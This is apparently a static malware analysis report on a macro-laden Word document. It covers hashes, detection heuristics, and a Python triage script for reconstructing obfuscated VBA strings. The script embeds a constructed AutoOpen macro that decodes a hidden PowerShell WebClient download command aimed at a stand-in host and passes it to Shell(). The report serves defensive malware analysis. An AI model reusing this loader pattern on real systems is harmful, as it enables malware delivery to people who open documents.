Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 590c770ec353b0e4…

MALICIOUS

Office (OOXML)

Size: 22.7 KB
Created: 2021-07-07 16:35:00 UTC
Authoring application: Microsoft Office Word 15.0000
MD5: f2a894909b6ca033edbb3ebe36dc09e8
SHA-1: 9f1707fe236bac6de28c98c42f0b6fbc9062e97a
SHA-256: 590c770ec353b0e4c39bf2f89780542f08bd2b3845fc32ba9ebc6d60c11e9ad7
Risk score: 302

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment T1204.002 Malicious File

The sample is an OOXML (Word) document containing obfuscated VBA macros. The macros run automatically when the document is opened (AutoOpen/Auto_Open/Workbook_Open entry points) and use the Shell() function to launch a PowerShell process. The PowerShell command, reconstructed from the macro's string decoder, appears designed to download and execute a second-stage payload, i.e. downloader/dropper functionality. Note that none of the URLs extracted from the document (listed under EMBEDDED_URL below) is the download location: they are all OOXML schema namespaces, consistent with the second-stage URL being assembled at runtime by the decoder rather than stored in the macro source.

Heuristics 8

  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • VBA project inside OOXML medium OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
    • http://schemas.openxmlformats.org/markup-compatibility/2006
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships
    • http://schemas.openxmlformats.org/officeDocument/2006/math
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main
    • http://schemas.microsoft.com/office/word/2010/wordml
    • http://schemas.microsoft.com/office/word/2012/wordml
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk
    • http://schemas.microsoft.com/office/word/2006/wordml
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape
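
The loader shape flagged by OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER and the Shell()-to-PowerShell chain summarised under Malware Insights can be checked on the decoded macros.bas with a short script. The following is an added example written for this report, not the analysis engine's code and not this sample's macros: the VBA source embedded in it is constructed to exhibit the three decoder idioms the heuristic names (numeric Chr() array, hex-string decode, junk-token Replace), and the URL, variable names and the Dec() helper are invented for illustration. It locates auto-exec entry points, counts decoder shapes, finds execution sinks, and then replays the decoder idioms statically so the CreateObject()/Shell() arguments can be read without executing the macro.

```python
"""Static triage of an obfuscated auto-exec VBA loader (added example).

Three checks mirror the heuristics above: an auto-exec entry point, a string-decoder
shape, and an execution sink. A small evaluator then replays the decoder idioms so
the Shell()/CreateObject() arguments can be reconstructed without running the macro.
"""
import re

# Constructed macro source exhibiting the loader shape. It is NOT this sample's
# macros.bas; the URL, variable names and the Dec() helper are invented.
SAMPLE_VBA = r'''
Sub AutoOpen()
    Dim j As String, k As String, u As String, o As Object
    j = "poQUITOwershell -w hiddQUITOen -c (New-Object Net.WebClient).DownloadString('"
    k = Replace(j, "QUITO", "")
    u = Dec("68747470733a2f2f6578616d706c652e696e76616c69642f612e707331")
    Set o = CreateObject(Chr(87) & Chr(83) & Chr(99) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & Chr(46) & Chr(83) & Chr(104) & Chr(101) & Chr(108) & Chr(108))
    Shell k & u & "')", 0
End Sub

Function Dec(h As String) As String
    Dim i As Integer
    For i = 1 To Len(h) Step 2
        Dec = Dec & Chr(CLng("&H" & Mid(h, i, 2)))
    Next
End Function
'''

AUTOEXEC_RE = re.compile(
    r'^\s*(?:Private\s+|Public\s+)?(?:Sub|Function)\s+'
    r'(AutoOpen|Auto_Open|AutoExec|AutoClose|Document_Open|Document_Close|'
    r'Workbook_Open|Workbook_Close)\b', re.I | re.M)
DECODER_SHAPES = {  # the three decoder idioms named by the heuristic
    "numeric char-array": re.compile(r'(?:Chr\w*\(\s*\d+\s*\)\s*&\s*){3,}', re.I),
    "hex-string decode": re.compile(r'"&H"\s*&\s*Mid\(', re.I),
    "junk-token Replace": re.compile(r'Replace\(\s*\w+\s*,\s*"[^"]+"\s*,\s*""\s*\)', re.I),
}
SINK_RE = re.compile(r'\b(Shell|CreateObject|GetObject)\b\s*\(?(.*?)\)?\s*(?:,\s*\d+)?\s*$', re.I)
ASSIGN_RE = re.compile(r'^(?:Set\s+)?(\w+)\s*=\s*(.+)$', re.I)
REPLACE_RE = re.compile(r'^Replace\(\s*(\w+)\s*,\s*"([^"]*)"\s*,\s*"([^"]*)"\s*\)$', re.I)
FUNC_RE = re.compile(r'^\s*(?:Private\s+|Public\s+)?Function\s+(\w+)\b.*?^\s*End Function',
                     re.I | re.M | re.S)
# Expression tokens: string literal | Chr(n) | hexdecoder("hex") | identifier
TOKEN_RE = re.compile(
    r'"([^"]*)"|Chr\w*\(\s*(\d+)\s*\)|([A-Za-z_]\w*)\(\s*"([0-9A-Fa-f]*)"\s*\)|([A-Za-z_]\w*)', re.I)


def find_autoexec(src):
    return AUTOEXEC_RE.findall(src)


def find_hex_decoder_funcs(src):
    """Names (lower-cased) of user functions containing the &H/Mid() hex-decode idiom."""
    return {m.group(1).lower() for m in FUNC_RE.finditer(src)
            if DECODER_SHAPES["hex-string decode"].search(m.group(0))}


def eval_expr(expr, env, hex_funcs):
    """Concatenate literals, Chr(n), hex-decoder calls and known variables.
    Returns None as soon as anything is not modelled (the cue to escalate)."""
    out = []
    for m in TOKEN_RE.finditer(expr):
        if m.group(1) is not None:                       # "literal"
            out.append(m.group(1))
        elif m.group(2) is not None:                     # Chr(n)
            out.append(chr(int(m.group(2))))
        elif m.group(3) is not None:                     # Dec("6874...")
            if m.group(3).lower() not in hex_funcs or len(m.group(4)) % 2:
                return None
            out.append(bytes.fromhex(m.group(4)).decode("latin-1"))
        elif m.group(5).lower() in env:                  # variable already resolved
            out.append(env[m.group(5).lower()])
        else:
            return None
    return "".join(out) if out else None


def reconstruct_sinks(src, hex_funcs):
    """Walk the macro line by line, tracking string variables and resolving sinks."""
    env, sinks = {}, []
    for raw in src.splitlines():
        line = raw.strip()
        if not line or line.startswith("'"):
            continue
        m = ASSIGN_RE.match(line)
        if m:
            name, rhs = m.group(1).lower(), m.group(2).strip()
            r = REPLACE_RE.match(rhs)
            if r and r.group(1).lower() in env:          # junk-token removal
                env[name] = env[r.group(1).lower()].replace(r.group(2), r.group(3))
            else:
                val = eval_expr(rhs, env, hex_funcs)
                if val is not None:
                    env[name] = val
        s = SINK_RE.search(line)
        if s:
            sinks.append((s.group(1), eval_expr(s.group(2), env, hex_funcs)))
    return env, sinks


def triage(src):
    hex_funcs = find_hex_decoder_funcs(src)
    autoexec = find_autoexec(src)
    shapes = {k: len(v.findall(src)) for k, v in DECODER_SHAPES.items()}
    env, sinks = reconstruct_sinks(src, hex_funcs)
    return {
        "autoexec": autoexec,
        "decoder_shapes": shapes,
        "hex_decoder_funcs": sorted(hex_funcs),
        "sinks": sinks,
        # same combination the OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER heuristic describes
        "obfuscated_autoexec_loader": bool(autoexec) and bool(sinks) and any(shapes.values()),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_VBA).items():
        print(f"{key}: {value}")
```

Run it on the macros.bas produced by olevba instead of SAMPLE_VBA. The evaluator deliberately returns None for any construct it does not model (loops, Mid() slicing, arithmetic on character codes, environment lookups), so an unresolved sink argument is the signal to move to a full VBA emulator or a debugger rather than to trust a partial string.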

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename           Kind         Source                                                          Size
macros.bas         vba-macro    oletools.olevba.extract_macros (decoded VBA source from OOXML)  25185 bytes
                   SHA-256 4848bfe3fbe83506d9a9feca110652cbf41a75ec8c88e82bfdec2f2e45a2a3a4
vbaProject_00.bin  vba-project  OOXML VBA project: word/vbaProject.bin                          40960 bytes
                   SHA-256 37fb3bc8b3748db174ba476ed5cf991fb79cd5bd3f996fa8ae6d02fd12bf1e72